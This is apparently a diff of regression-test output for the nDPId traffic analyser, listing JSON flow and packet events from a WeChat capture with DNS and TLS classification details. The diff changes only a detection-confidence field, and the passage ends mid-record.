-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167639887,"flow_last_seen":1492167640203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167640203,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167639887,"flow_last_seen":1492167640203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167640203,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1492167640450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640450,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702LyUvm4GyuHH6ASN8hErAAAAgQFoAQCCApF8iogADHSWAEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1492167640450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640450,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0VUdAAEAGv\/3AqAFny82XotNiAbsbK4cf8lL5uYAQAOWp+QAAAQEICgAx0qZF8iog"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":898,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":898,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1492167648243,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1492167648243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7101AAEAR3q7AqAFnwKgB\/kphADUAJzTVMN0BAAABAAAAAAAAA3JlcwJ3eAJxcQNjb20AAAEAAQ=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1492167648277,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":537,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":537,"pkt_l4_len":503,"thread_ts_msec":1492167648277,"pkt":"eJKcD6iO8IQvSpdgCABFoAILAABAAEARs4zAqAH+wKgBZwA1SmEB91rcMN2BgAABAA0AAgAMA3JlcwJ3eAJxcQNjb20AAAEAAcAMAAUAAQAADgoACwVyZXN3eAJ0Y8ATwCsABQABAAAALgANBXJlc3d4BHRjZG7AE8BCAAUAAQAAAC8ABgNzc2TAMcBbAAUAAQAAAhgABgNzc2TASMBtAAEAAQAAAIwABMvNniLAbQABAAEAAACMAATLzZfUwG0AAQABAAAAjAAEy82eNcBtAAEAAQAAAIwABMvNnjfAbQABAAEAAACMAATLzZfjwG0AAQABAAAAjAAEy82eI8BtAAEAAQAAAIwABMvNnjjAbQABAAEAAACMAATLzZfTwG0AAQABAAAAjAAEy82eNsBIAAIAAQAANa8ACgducy1jZG4xwBPASAACAAEAADWvAAoHbnMtY2RuMsATwQ8AAQABAAACoQAEtv4QccEPAAEAAQAAAqEABLhpznrBDwABAAEAAAKhAAQOEROMwQ8AAQABAAACoQAEZwce7sEPAAEAAQAAAqEABHt+dlDBDwABAAEAAAKhAAS0oxYuwSUAAQABAAACoQAEtv4LcsElAAEAAQAAAqEABLb+bmTBJQABAAEAAAKhAATLzZfxwSUAAQABAAACoQAEDhEsW8ElAAEAAQAAAqEABHBaSWTBJQABAAEAAAKhAAR9Jy3o"} -00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":1,"num_answers":27,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.158.34"}} +00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":1,"num_answers":27,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.158.34"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648277,"flow_last_seen":1492167648277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1492167648277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648277,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8euFAAEAGk9vAqAFny82eIqtKAbscYaCqAAAAAKACchBlYgAAAgQFtAQCCAoAMdpLAAAAAAEDAwc="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648494,"flow_last_seen":1492167648494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1492167648494,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648494,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/\/9AAEAGDr3AqAFny82eIqtLAbsShiV+AAAAAKACchDqMgAAAgQFtAQCCAoAMdqBAAAAAAEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1492167648582,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648582,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0qHWOtEHGGgq4ASOQgtSgAAAgQFtAEBBAIBAwMH"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1492167648582,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648582,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoeuJAAEAGk+7AqAFny82eIqtKAbscYaCrh1jrRVAQAOWmPwAA"} -00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167648277,"flow_last_seen":1492167648583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1492167648583,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167648277,"flow_last_seen":1492167648583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1492167648583,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1492167648873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648873,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0tO\/rLJEoYlf4ASOQgjJgAAAgQFtAEBBAIBAwMH"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1492167648873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648873,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoAABAAEAGDtHAqAFny82eIqtLAbsShiV\/Tv6yylAQAOWcGwAA"} -01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":968,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167648277,"flow_last_seen":1492167648902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1492167648902,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1"}} -01570{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":970,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167648277,"flow_last_seen":1492167648903,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":5407,"flow_avg_l4_payload_len":675,"midstream":0,"thread_ts_msec":1492167648903,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","server_names":"wx1.qq.com,webpush.wx.qq.com,webpush1.weixin.qq.com,loginpoll.weixin.qq.com,login.wx.qq.com,file.wx2.qq.com,wx2.qq.com,login.wx2.qq.com,wxitil.qq.com,file.wx.qq.com,login.weixin.qq.com,webpush2.weixin.qq.com,webpush.wx2.qq.com,webpush.weixin.qq.com,web.weixin.qq.com,res.wx.qq.com,wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=CN, ST=Guangdong, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, OU=R&D, CN=wx.qq.com","alpn":"h2,http\/1.1","fingerprint":"67:53:57:7F:22:BB:D0:A6:D4:5F:A6:D4:B3:0A:13:73:29:23:D0:C9"}} +01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":968,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167648277,"flow_last_seen":1492167648902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1492167648902,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1"}} +01570{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":970,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167648277,"flow_last_seen":1492167648903,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":5407,"flow_avg_l4_payload_len":675,"midstream":0,"thread_ts_msec":1492167648903,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","server_names":"wx1.qq.com,webpush.wx.qq.com,webpush1.weixin.qq.com,loginpoll.weixin.qq.com,login.wx.qq.com,file.wx2.qq.com,wx2.qq.com,login.wx2.qq.com,wxitil.qq.com,file.wx.qq.com,login.weixin.qq.com,webpush2.weixin.qq.com,webpush.wx2.qq.com,webpush.weixin.qq.com,web.weixin.qq.com,res.wx.qq.com,wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=CN, ST=Guangdong, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, OU=R&D, CN=wx.qq.com","alpn":"h2,http\/1.1","fingerprint":"67:53:57:7F:22:BB:D0:A6:D4:5F:A6:D4:B3:0A:13:73:29:23:D0:C9"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1492167650311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492167650311,"pkt":"8IQvSpdgeJKcD6iOCABFAAA916xAAEAR3k3AqAFnwKgB\/uySADUAKTCBKzkBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 